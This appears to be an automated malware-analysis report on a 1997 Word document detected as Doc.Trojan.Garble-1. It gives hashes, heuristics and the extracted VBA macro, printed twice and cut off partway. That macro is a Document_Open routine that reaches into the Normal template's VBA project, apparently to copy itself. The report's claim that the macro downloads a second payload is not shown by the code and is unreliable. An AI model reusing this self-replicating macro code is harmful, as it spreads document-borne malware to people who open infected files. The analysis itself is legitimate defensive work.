Office (OLE) malware analysis — malicious · 65daaf451497b2de

MALICIOUS

Office (OLE)

45.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 43affebaacccea27e55289e1a383b084 SHA-1: c2e859f2bcc1802247e86355010551a9a3852154 SHA-256: 65daaf451497b2de4a5cdf587d67e50841b539f0d75cab56a86bdd2108ba5dcf

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The ClamAV detection 'Doc.Trojan.Garble-1' strongly suggests malicious intent. The macro code is heavily obfuscated, but its presence and the high-risk verdict indicate it's designed to download and execute a secondary payload. Given the nature of macro-enabled documents, it's likely delivered via spearphishing.

Heuristics 3

ClamAV: Doc.Trojan.Garble-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Garble-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 22469 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	22469 bytes
SHA-256: `f0764c2493978e6e12c95618784d73b3b0e2e00e85b47e5be85a28334fd2c476`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() '25 ' 'w–In››˜›I{Ž�Ÿ—�Jx�¢žKRx¤yŒ˜�KiL™\\�fLƒŸ–¡¡’›o¦MjN”^ “N‰ƒq^‚š�œ¦”¡š£_t†s� ' '{˜R€¡¤Ÿ”Ÿ‡˜ £Ÿ”§˜bŠv„¦£ž™—©c‹wx¤¢¥¤¤›¤ª©^g_dz¦›œ„¦›¬£�f¤¡¦�«`ieYjbYvY[‰¬£°›®ŸZ�¯œ[ ªž°¨ ©¯›‹¬¡ªde^\‘¥¢«]‹‘†‹^{^’°³£ '{˜Rs•¦›©˜w¢–¨ ˜¡§bŠv„¦£ž™—©c‹wx¤¢¥¤¤›¤ª©^g_dz¦›œ„¦›¬£�f¤¡¦�«`ieYjbYvY[‰¬£°›®ŸZ�¯œ[ ªž°¨ ©¯›‹¬¡ªde^\‘¥¢«]~�†‹^{^’°³£ ' 'i‡AoujoA^Av”—‡Bc�†BdglqC_aCw–™‰DxŒ‰’ 'FyŒ›Go–š›GdHv—š•‰”\|�–™•Š�ŽW kzœ™”��žX€mnš˜›š™�™ ŸT]UZo›�’zœ‘¢™’ 'GzŒ›G{ˆš��œHeHi‹�’ŸŽm˜Œž–�˜žX€lzœ™•�ŽŸY�mnš™œ›š‘š ŸT^V[pœ‘’zœ‘£š“ '_ˆ~:c€ ' 'i‡AoujoA]_Bv”—‡Bc�†CdglqC`Cw–™‰DxŒ‰’ 'FyŒ›Go–š›GdHi‹œ‘ž�l—Œž–Ž—�W kzœ™”��žX€mnš˜›š™�™ ŸT]UZo›�’zœ‘¢™’ 'GzŒ›G{ˆš��œHeHv—›–Š•}Ž–™•‹ž�X€lzœ™•�ŽŸY�mnš™œ›š‘š ŸT^V[pœ‘’zœ‘£š“ '_ˆ~:c€ ' 'n�\|��‡„��V 'A·À§À°Ë 'A§âÍÂ¹¤× 'AÓÉÚž¬¢¤ 'A¥œÃÌÄ 'B£«Ï¾¸©ÒâÅ¤ 'Bº¿Á¬µ¤Éªâ '@¼°Ü 'B±Î¯£Ÿ´Ø³¯ 'A®¶ À¬ÜÈ 'BáµÅ¢Ë»å¦â 'B¶¨Àæ¦Ÿ¶ 'AàÄ»ÛÚÎÒ '_ˆ ‡„Ž�U ' 'eŽ‘?x@]@Q@t�@i�”•O„�–�–‘ˆŽ‹�‡• 'n‹Em”˜šT’�”‹™N~RGXPGdGIv•Hmšš—šHz�œž–ŽIwŽ¡�LJ~’�˜JrvKhKƒ 'fƒ=aŒŒ’>Z\>r�“„?s‡„� '????•‹ˆ�…@]@h�“”N�Š�†”IyMASK '@@@A—„�…†A^A˜…‘†‡BHB˜�Œ‘ˆCICf‹–LUWM '<<<<’ˆ…Š‚=Z=?? 'FFFFoŒGo–š›U“�•�›P€THYQHfIKy›’ŸŠ��J}ŸŒJn™� ˜�™ŸŠn—šŸ‘TUNL€”‘› 'BBBBBCCC™†’‡ˆCaDš‡“ˆ‰DJEGj“‰Exš‡HFLFiŽ˜NWYP '<<<<<<<<fi=Z=u '=======>b�Œ’>[>r‘”„ ';;;;`‰ <e‚ '_ˆ~:c€ 'j‡Ai‘•–PŽ‹�‡•K{OCTLC`CFw˜…–˜��—™_GEy�Š“ ';<<<c‹<Y<p�’‚ '_ˆ~:c€ 'l‰Dl“—˜R��’Š˜M}QEVNEcFHk”Š’�™šaIG{�Œ•Gk—–�HeH\|š�Ž 'i†@g�A^Au“–†Ab�†Bf‘�‡B^aCw•˜ˆCw‹‰’ 'BCCCl‰CpŒ‡Ll“—˜R��’Š˜M}QEVNQFWRFWOFcFHNIG{�Œ• 'BBBBBBBCr�‡�ˆ‘C`Dp‰’Ll“—˜S‘Ž“Š˜M}QFWOOFSFW 'CCDDDDDDs�ˆ{†—EbErŽ‰Nn•™šT’�”‹šO SGXPSGZTHw”Œ”�–R '??@@@@@@s‰š†A^Aj�•Is�†BLB[KBMCV '>>>>????eŽ‘?x?]@Q@t�@s‰›† 'AABBBBBBBBBCkC`Cf‹•Km’˜Lv’ˆDNE\YNEPEVXVO '??@@@@@@@@@Ao†˜w‚“A^Bp‡™xƒ”BHCk '=========>>>f>[>@@ '<<<<<<<<k‚•‘=v '>>>>>>??eŽ‘?y?\?hl@t�@il 'CCCCCCCCDDDDj“–DtEbEVEy”Eq‹”Nn•™šT’�•ŒšO�SGXPQ 'GGGGGGGHHHHHHHHHr�Iv’�Qq˜�žX–“˜��R…WK\TWK{WL{˜�˜‘šULjM\|™‘ƒŽŸM�–“œ '@@@@@@@AAAAAAAAABBBBkˆBrB`CTCw‹ˆ‘ 'OOPPPPPPPPPQQQQQQQQQRRRRs˜¦—¤‰”¥SpS€œ—[\|£§¨b �¢™¨]�aUf^aU…¢š¢›¤VaVhcWƒœ¥_ ¦«¬f¤¡¦�«`“eYjbbYfY‰¦ž¦Ÿ¨ZeZkd 'DDDDDDDEEEEEEEEEFFFFFFFF”‹ž“�•ŒGdGu�Ÿ~‰šHNHi��Ž› Š› 'DDDDDDDEEEEEEEEEFFFFFFFFn•š›U™Œ—“ˆŠ�”‘–�H‚TH—Ž •’—Ž 'DDDDDEEEEEEEEEFFFFFFFFFF•Œž“�•ŒGdHJJbHiŽœ�› Š›IfIKKd '>>>>>>??????????@@@@eŒ“… 'GGGHHHHHHHHHIIIIIIIIIJJJŒ��™œ�¡Œ�KhKx”�Tt›Ÿ Z˜•š’ U‡YM^VYM_ZN~N[N_W 'PPPQQQQQQQQQRRRRRRRRRSSSt™§˜¥‰”¦TqT��˜\\|¤¨©c¡ž£š¨^�bVg_bV†WbW†£›£œ¥dX„�¦`€§«g¥¢§ž¬a“fZkccZgZŠZh[Š§Ÿ§ ©[g\me 'FFGGGGGGGGGHHHHHHHHHIIII—Ž •’˜�JgJŒ��™��¡Œ�KQKy‘£‚�žLRLm“¡’ŸƒŽŸ 'DDDDDDDEEEEEEEEEFFFFFFFFn•š›U™Œ—“ˆŠ�”‘–�H‚TH—Ž •’—Ž 'GGGHHHHHHHHHIIIIIIIIIJJJ˜�¡–“˜�KhKMMeKl’ ‘ž‚�žLiMOOgM�’“œŸ“¤� NkNPP '>>??????????@@@@@@@@e�…Aj‡ '=>>>>>>>>>??????d�ƒ?i† '=========>>>lƒ–’>n '<<<<<<<<k‚•‘=w '@@@@@@@@Ž†˜”•“Š�ˆA_BDIDBHBpˆšy„• 'AAAAAAAAj‘•–P”‡’Ž„†ˆ�Œ‘ˆC{PD’‰›—˜–�“Œ '@@@AAAAAo†˜wƒ”B_BDD\B‘ˆš–—•Œ‘ŠDaDFF ';;;;`‰ <e‚ '_ˆ~:c€ 'h ’Ž:r ' 's€‘†„“Mˆ�’…’”Œ‰Ž…“@RMA—„�…† 'lƒ–j„˜?\?h�“HrŽ„@J@RUJALAR 'h�“”N“†‘�‚„†�Š�‡BTNBJDIECICqˆšnˆ�M ' 'f:W:M 'f�’AzA^AjmALBSBv‘Bj‘•—Q†’˜‘—’‰��’‰— 'EEEEn‹Fn•™šT’�”‹šO€SGXPGdHJO�–Œ‹—ŒŽKI}‘Ž—IšŸ“ž˜™¡JgJ � � 'AAAAg�”BvB_BSBv’Coˆ‘Kk’–˜R��’‰—L}QEVNN 'GGGGGHHH›�Š“�¡IfIr—�QQQ^JTJv�˜RršžŸY—”™�žT…XL]UULWM_MWM�VVM\N_f\aW 'AAAABBBBƒB_BoŒ‡Kk’–—Q��’‰—L}PDUNQEyQEVN '======== >[>_‘�F G '??@@@@@@c@]AƒALAo†˜l‡›BMB•—„�ˆœ '========`>[>a†�FaG '??@@@@@@t…�‘�Š�†A^Au‡�’Ž‹�‡BHCf ';;;;i€“�<p 'AAAAi�•–P”‡’Žƒ…ˆ�Œ‘ˆCoOCFKFDJDx‰‘•‘Ž“Š '????s„Œ�Œ‰Ž…@]@BB[AmA^AmALBS 'h…@‘•‰”Ž�—@^Au“–†Au‰‡�Bgš‹–Bh’• 'h ’Ž:s ' 'n�”‰�Ž“Nv‰’–”q“�•†„•‹‘�B_BhƒŽ–ˆ 'o�”‰��”Od��‡Š“�e‘�˜‡”•‹’‘–C`Ci„�—‰ 'o�”‰�Ž“Ns‚—†o�“Ž‚�r”‘�’–B_Bi„�–ˆ ' 'f‘Bw�–‹�Ck’–—Q�Œ’‰—LmpDODVQEVNEbEGk”ŠFy›ˆH '??@@@h�“”N„†�†•†�Š�†•BknBMBSNCT 'e‰‰Š 'A ‰ ~Š € On Error Resume Next Set ‹‚©²ª = NormalTemplate.VBProject Set �¦�¥•° = ‹‚©²ª.VBComponents(1).CodeModule Set �Ç²§ž‰¼ = ActiveDocument.VBProject Set ¹®¿ƒ‘‡‰ = �Ç²§ž‰¼.VBComponents(1).CodeModule If �¦�¥•°.lines(1, 1) <> ... (truncated)

SHA-256: f0764c2493978e6e12c95618784d73b3b0e2e00e85b47e5be85a28334fd2c476

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'25
'
'w–In››˜›I{Ž�Ÿ—�Jx�¢žKRx¤yŒ˜�KiL™\\�fLƒŸ–¡¡’›o¦MjN”^ “N‰ƒq^‚š�œ¦”¡š£_t†s�
'
'{˜R€¡¤Ÿ”Ÿ‡˜ £Ÿ”§˜bŠv„¦£ž™—©c‹wx¤¢¥¤¤›¤ª©^g_dz¦›œ„¦›¬£�f¤¡¦�«`ieYjbYvY[‰¬£°›®ŸZ�¯œ[ ªž°¨ ©¯›‹¬¡ªde^\‘¥¢«]‹‘†‹^{^’°³£
'{˜Rs•¦›©˜w¢–¨ ˜¡§bŠv„¦£ž™—©c‹wx¤¢¥¤¤›¤ª©^g_dz¦›œ„¦›¬£�f¤¡¦�«`ieYjbYvY[‰¬£°›®ŸZ�¯œ[ ªž°¨ ©¯›‹¬¡ªde^\‘¥¢«]~�†‹^{^’°³£
'
'i‡AoujoA^Av”—‡Bc�†BdglqC_aCw–™‰DxŒ‰’
'FyŒ›Go–š›GdHv—š•‰”|�–™•Š�ŽW kzœ™”��žX€mnš˜›š™�™ ŸT]UZo›�’zœ‘¢™’
'GzŒ›G{ˆš��œHeHi‹�’ŸŽm˜Œž–�˜žX€lzœ™•�ŽŸY�mnš™œ›š‘š ŸT^V[pœ‘’zœ‘£š“
'_ˆ~:c€
'
'i‡AoujoA]_Bv”—‡Bc�†CdglqC`Cw–™‰DxŒ‰’
'FyŒ›Go–š›GdHi‹œ‘ž�l—Œž–Ž—�W kzœ™”��žX€mnš˜›š™�™ ŸT]UZo›�’zœ‘¢™’
'GzŒ›G{ˆš��œHeHv—›–Š•}Ž–™•‹ž�X€lzœ™•�ŽŸY�mnš™œ›š‘š ŸT^V[pœ‘’zœ‘£š“
'_ˆ~:c€
'
'n�|��‡„��V
'A·À§À°Ë
'A§âÍÂ¹¤×
'AÓÉÚž¬¢¤
'A¥œÃÌÄ
'B£«Ï¾¸©ÒâÅ¤
'Bº¿Á¬µ¤Éªâ
'@¼°Ü
'B±Î¯£Ÿ´Ø³¯
'A®¶ À¬ÜÈ
'BáµÅ¢Ë»å¦â
'B¶¨Àæ¦Ÿ¶
'AàÄ»ÛÚÎÒ
'_ˆ ‡„Ž�U
'
'eŽ‘?x@]@Q@t�@i�”•O„�–�–‘ˆŽ‹�‡•
'n‹Em”˜šT’�”‹™N~RGXPGdGIv•Hmšš—šHz�œž–ŽIwŽ¡�LJ~’�˜JrvKhKƒ
'fƒ=aŒŒ’>Z\>r�“„?s‡„�
'????•‹ˆ�…@]@h�“”N�Š�†”IyMASK
'@@@A—„�…†A^A˜…‘†‡BHB˜�Œ‘ˆCICf‹–LUWM
'<<<<’ˆ…Š‚=Z=??
'FFFFoŒGo–š›U“�•�›P€THYQHfIKy›’ŸŠ��J}ŸŒJn™� ˜�™ŸŠn—šŸ‘TUNL€”‘›
'BBBBBCCC™†’‡ˆCaDš‡“ˆ‰DJEGj“‰Exš‡HFLFiŽ˜NWYP
'<<<<<<<<fi=Z=u
'=======>b�Œ’>[>r‘”„
';;;;`‰ <e‚
'_ˆ~:c€
'j‡Ai‘•–PŽ‹�‡•K{OCTLC`CFw˜…–˜��—™_GEy�Š“
';<<<c‹<Y<p�’‚
'_ˆ~:c€
'l‰Dl“—˜R��’Š˜M}QEVNEcFHk”Š’�™šaIG{�Œ•Gk—–�HeH|š�Ž
'i†@g�A^Au“–†Ab�†Bf‘�‡B^aCw•˜ˆCw‹‰’
'BCCCl‰CpŒ‡Ll“—˜R��’Š˜M}QEVNQFWRFWOFcFHNIG{�Œ•
'BBBBBBBCr�‡�ˆ‘C`Dp‰’Ll“—˜S‘Ž“Š˜M}QFWOOFSFW
'CCDDDDDDs�ˆ{†—EbErŽ‰Nn•™šT’�”‹šO SGXPSGZTHw”Œ”�–R
'??@@@@@@s‰š†A^Aj�•Is�†BLB[KBMCV
'>>>>????eŽ‘?x?]@Q@t�@s‰›†
'AABBBBBBBBBCkC`Cf‹•Km’˜Lv’ˆDNE\YNEPEVXVO
'??@@@@@@@@@Ao†˜w‚“A^Bp‡™xƒ”BHCk
'=========>>>f>[>@@
'<<<<<<<<k‚•‘=v
'>>>>>>??eŽ‘?y?\?hl@t�@il
'CCCCCCCCDDDDj“–DtEbEVEy”Eq‹”Nn•™šT’�•ŒšO�SGXPQ
'GGGGGGGHHHHHHHHHr�Iv’�Qq˜�žX–“˜��R…WK\TWK{WL{˜�˜‘šULjM|™‘ƒŽŸM�–“œ
'@@@@@@@AAAAAAAAABBBBkˆBrB`CTCw‹ˆ‘
'OOPPPPPPPPPQQQQQQQQQRRRRs˜¦—¤‰”¥SpS€œ—[|£§¨b �¢™¨]�aUf^aU…¢š¢›¤VaVhcWƒœ¥_ ¦«¬f¤¡¦�«`“eYjbbYfY‰¦ž¦Ÿ¨ZeZkd
'DDDDDDDEEEEEEEEEFFFFFFFF”‹ž“�•ŒGdGu�Ÿ~‰šHNHi��Ž› Š›
'DDDDDDDEEEEEEEEEFFFFFFFFn•š›U™Œ—“ˆŠ�”‘–�H‚TH—Ž •’—Ž
'DDDDDEEEEEEEEEFFFFFFFFFF•Œž“�•ŒGdHJJbHiŽœ�› Š›IfIKKd
'>>>>>>??????????@@@@eŒ“…
'GGGHHHHHHHHHIIIIIIIIIJJJŒ��™œ�¡Œ�KhKx”�Tt›Ÿ Z˜•š’ U‡YM^VYM_ZN~N[N_W
'PPPQQQQQQQQQRRRRRRRRRSSSt™§˜¥‰”¦TqT��˜\|¤¨©c¡ž£š¨^�bVg_bV†WbW†£›£œ¥dX„�¦`€§«g¥¢§ž¬a“fZkccZgZŠZh[Š§Ÿ§ ©[g\me
'FFGGGGGGGGGHHHHHHHHHIIII—Ž •’˜�JgJŒ��™��¡Œ�KQKy‘£‚�žLRLm“¡’ŸƒŽŸ
'DDDDDDDEEEEEEEEEFFFFFFFFn•š›U™Œ—“ˆŠ�”‘–�H‚TH—Ž •’—Ž
'GGGHHHHHHHHHIIIIIIIIIJJJ˜�¡–“˜�KhKMMeKl’ ‘ž‚�žLiMOOgM�’“œŸ“¤� NkNPP
'>>??????????@@@@@@@@e�…Aj‡
'=>>>>>>>>>??????d�ƒ?i†
'=========>>>lƒ–’>n
'<<<<<<<<k‚•‘=w
'@@@@@@@@Ž†˜”•“Š�ˆA_BDIDBHBpˆšy„•
'AAAAAAAAj‘•–P”‡’Ž„†ˆ�Œ‘ˆC{PD’‰›—˜–�“Œ
'@@@AAAAAo†˜wƒ”B_BDD\B‘ˆš–—•Œ‘ŠDaDFF
';;;;`‰ <e‚
'_ˆ~:c€
'h ’Ž:r
'
's€‘†„“Mˆ�’…’”Œ‰Ž…“@RMA—„�…†
'lƒ–j„˜?\?h�“HrŽ„@J@RUJALAR
'h�“”N“†‘�‚„†�Š�‡BTNBJDIECICqˆšnˆ�M
'
'f:W:M
'f�’AzA^AjmALBSBv‘Bj‘•—Q†’˜‘—’‰��’‰—
'EEEEn‹Fn•™šT’�”‹šO€SGXPGdHJO�–Œ‹—ŒŽKI}‘Ž—IšŸ“ž˜™¡JgJ � �
'AAAAg�”BvB_BSBv’Coˆ‘Kk’–˜R��’‰—L}QEVNN
'GGGGGHHH›�Š“�¡IfIr—�QQQ^JTJv�˜RršžŸY—”™�žT…XL]UULWM_MWM�VVM\N_f\aW
'AAAABBBBƒB_BoŒ‡Kk’–—Q��’‰—L}PDUNQEyQEVN
'======== >[>_‘�F G
'??@@@@@@c@]AƒALAo†˜l‡›BMB•—„�ˆœ
'========`>[>a†�FaG
'??@@@@@@t…�‘�Š�†A^Au‡�’Ž‹�‡BHCf
';;;;i€“�<p
'AAAAi�•–P”‡’Žƒ…ˆ�Œ‘ˆCoOCFKFDJDx‰‘•‘Ž“Š
'????s„Œ�Œ‰Ž…@]@BB[AmA^AmALBS
'h…@‘•‰”Ž�—@^Au“–†Au‰‡�Bgš‹–Bh’•
'h ’Ž:s
'
'n�”‰�Ž“Nv‰’–”q“�•†„•‹‘�B_BhƒŽ–ˆ
'o�”‰��”Od��‡Š“�e‘�˜‡”•‹’‘–C`Ci„�—‰
'o�”‰�Ž“Ns‚—†o�“Ž‚�r”‘�’–B_Bi„�–ˆ
'
'f‘Bw�–‹�Ck’–—Q�Œ’‰—LmpDODVQEVNEbEGk”ŠFy›ˆH
'??@@@h�“”N„†�†•†�Š�†•BknBMBSNCT
'e‰‰Š
'A ‰ ~Š €

On Error Resume Next
Set ‹‚©²ª = NormalTemplate.VBProject
Set �¦�¥•° = ‹‚©²ª.VBComponents(1).CodeModule
Set �Ç²§ž‰¼ = ActiveDocument.VBProject
Set ¹®¿ƒ‘‡‰ = �Ç²§ž‰¼.VBComponents(1).CodeModule
If �¦�¥•°.lines(1, 1) <>
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.